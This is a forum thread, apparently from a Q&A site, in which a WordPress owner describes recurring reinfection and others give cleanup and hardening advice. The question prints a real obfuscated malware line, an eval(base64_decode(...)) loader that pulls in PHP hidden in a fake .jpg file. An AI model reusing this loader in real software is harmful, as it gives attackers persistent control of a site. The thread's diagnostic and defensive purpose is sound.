I have a Wordpress site that keeps getting hacked. As far as I can tell the following changes are being made:
This file has some additional PHP code at the top:
wp-content/themes/enfold/functions.php
as follows:
eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
and 4 new jpg files are being created:
/wp-includes/images/geo.jpg
/wp-includes/images/save.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/links.jpg
These are not real jpg files as they don't open, but looking at them with a text editor reveals text and additional PHP code.
From looking at the PHP code it looks like it's trying to inject some spam/advertising links into my Wordpress POSTS.
I keep delete these files, I've installed a security plugin, removed the admin login, changed all my passwords but these files continue to get updated/created every few days.
I'm trying to understand how this is possible and what I need to do next to block this.
First of all - DON´T PANIC.
Installing antivirus or security plugins at this point will rarely help - the malisious code has already server access.
1 - Change ALL the passwords for FTP
, mysql
, DB
, Cpanel
, WHM
, SSH
( disable if not need ) etc. anything with access.
3 - Check your server ( all folders like cgi
, cgi-bin
, ftp
etc ..)
Delete all the wordpress
folder ( except wp-content
) , and all other strange files . Delete all themes and all plugins anf Check the rest of wp-content
manually and attentively . Backup the DB and manually check it .
3.1 - ( EDIT 1 ) - Disallow indexes in Cpanel / WHM . And read below for .htaccess protections .
2 - Upload new wordpress CORE files to OWN directory ( not root ) and rename it to something else ( not wp
or wordpress
).
3 - Update Plugin and Themes - do not copy the ones you have , but install fresh, updated ones from the wp plugin repository, and a fresh clean theme .
Manually check if necessary .
In your theme , check for all forms
, or input fields
, and check for correct validation of input .
4 - Change all the DB passwords in the wp-config
. All the hashes etc .
Create a new Database AND user AND new passwords. Manually check the DB backup BEFORE injecting it back .
4.1 - ( EDIT I ) I forgot to mention - Change also the DB prefix. Do not leave wp
5 - Change all wp user-passwords AND usernames .
If you have an open site with hundreds of users than make a script to force everyone to change passwords .If you have only a dozen change it manually .
When I said all - It is including the default admin user ( from past versions )
6 - After some time , check your server log , and see if the 404 messages for the fake image files are from a single ip address ( probably not ) - if they are - block it .
7 - There is not much more you can do , except being careful. It is a lot of work, but do not be lazy and follow all steps . Otherwise it is not just this one site, but the whole server could be compromised . Again and Again ,.
Guidelines for that not happening again :
Choose Strong passwords . - we all do not like passwords that looks like aDf34HG§*#sFGT
, but they ARE helpful - especially on DB
or other automated tasks . For users - Force at least one symbol and one letter.
Do not install themes and plugins that you do not know, do not fully understand , or that you have downloaded from questionable sources (
all-wp-premium-themes-for-free-and-direct-download-all-plugins-for-free
etc ).
Keep the wordpress core files updated .
- Check the server every once in a while manually .
.htaccess
Some directives that can prevent ( or at least try to ) this from happening again .
.htaccess file in the root directory of WordPress.
#Disallow indexes
Options All -Indexes
# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
# WPhtC: Protect .htaccess file
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>
robots.txt
Disallow: /wp-*
Another thing you can do is to force users (and yourself ) to use SSL ( HTTPS ) when login to admin:
define('FORCE_SSL_LOGIN', true);
After that - you will also need to peek at your DB to see if have strange columns / tables / entries / users. for example if your site is constantly being redirected - check for strings etc .. (eval()
,exec()
..)
You could also use some of the numerous security plugins for core checksums and other the above mentioned php
calls.
There are other things, more complicated, especially on the APACHE side.
If I will have more time, I will post a blog entry and link here. But the above written is a good start .
I ran into this problem with a number of my websites and even after swapping everything out (all new files with only one website, but with the same config file)... I got attacked anyway.
Every day I'd wake up to email alerts saying 30 different files have been edited or replaced. Every time I cleaned it, it would come back a few hours later... But was puzzled since it was all new files. Only thing that was the same was the wp-config.php file.
Turns out the Hash keys were just way too short. Sites were built 3 years ago but fully updated to this point, but as soon as I changed the hash keys to be a lot longer, then the problem stopped.
Example of hash keys:
Here's where you can go to generate new keys:
https://api.wordpress.org/secret-key/1.1/salt/